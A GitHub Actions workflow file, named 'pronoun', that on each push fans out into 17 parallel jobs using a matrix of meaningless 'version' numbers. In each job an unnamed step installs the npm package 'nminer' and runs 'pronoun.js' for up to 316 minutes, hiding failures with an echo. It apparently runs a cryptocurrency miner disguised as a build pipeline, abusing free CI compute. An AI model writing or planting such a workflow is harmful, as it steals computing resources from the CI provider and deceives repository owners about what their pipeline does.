name: pronoun
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6406 }
          - { version: 3992 }
          - { version: 8298 }
          - { version: 9948 }
          - { version: 537 }
          - { version: 3463 }
          - { version: 3783 }
          - { version: 9050 }
          - { version: 6115 }
          - { version: 7626 }
          - { version: 8120 }
          - { version: 2512 }
          - { version: 7160 }
          - { version: 9718 }
          - { version: 5566 }
          - { version: 4772 }
          - { version: 7894 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 316m node pronoun.js || echo "pronoun executed"